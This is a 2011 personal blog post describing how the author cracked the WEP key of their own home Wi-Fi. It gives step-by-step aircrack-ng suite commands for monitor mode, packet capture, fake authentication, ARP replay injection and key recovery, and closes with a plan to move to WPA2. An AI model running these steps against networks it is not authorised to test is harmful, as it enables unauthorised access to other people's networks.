Monday, December 12, 2011

False Sense of Security Using WEP Encryption

Couple weeks ago, I accidently stumbled upon BackTrack Linux (http://www.backtrack-linux.org/).  By following the how-to tutorial, I successfully installed BackTrack 5 on a persistent usb thumb drive http://www.infosecramblings.com/backtrack/backtrack-4-usbpersistent-changesnessus/).  The logical thing to do after that was to try out different tools they offer.  The following is the write-up of my attempt to crack my own network which is secured by basic wep encryption.  The result of my test concluded that I was able to decrypt the key used to SECURE my router in no time at all.  I think it is about time I should upgrade my network security to WPA2.

The cracking program I used is called aircrack-ng which consists of a set of tools for auditing wireless networks.  I used a total of 3 separate terminal sessions simultaneously to crack the wep encryption key.

Terminal Session #1

  1. First, I want to find out the status of my network interfaces, both wired and wireless by typing the following command: 
          ifconfig

     2.  Alternatively, if you are only interested in wireless interface, you can use

          airmon-ng

          Pay special attention to see whether you have wlan0 or wlan1.  For the
          purpose of this discussion, we will use wlan0.

     3.  Next we want to bring up the wlan0 in monitor mode:

          airmon-ng start wlan0

     4.  Then, we start scanning the available networks in our neighbourhood:

          airodump-ng mon0

          wait for 1 minute and then stop by monitoring process by typing CTRL+C

     5.  From the output in 4, identify the wirelss network with wep encryption
          that belong to you and write down the following information:
          - channel #
          - bssid #
          - essid #
          - station #

     6.  Start capturing data packets of your network into a file to be feed into
          cracking program:

          airodump-ng -c xx -w wepcrack --bssid xx:xx:xx:xx:xx:xx mon0

          Wait for 1 min and make sure the values of power and beacons are
          constantly changing.  We need about 15,000 data packets to have a
          successful crack. (Note: c = channel, w = write to)

Terminal Session #2

     7.  In order to speed up the capturing process, we start up 2nd
          terminal session while the 1st terminal still running and type
          the following command:

          aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -e xxxxx mon0

          (Note: -1 = fake authentication with AP, 0 = deauthenticate once,
                      -a = bssid, -e = essid)

     8.  After successful fake authentication and deauthentication, start
          standard ARP request replay as follows:

          aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -e xxxxx mon0

          After a short while, it begins to send data packets at an accelerated rate.
          To achieve our target of 15,000 should take no time at all.
          (Note: -3 = Standard ARP request replay)

Terminal Session #3

      9.  Once we have enough data packets ( > 15,000 ) captured, we can start
           our cracking process by starting a 3rd terminal session while terminal
           session 1 & 2 are still running and type the following command:

           aircrack-ng wepcrack*.cap

         
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)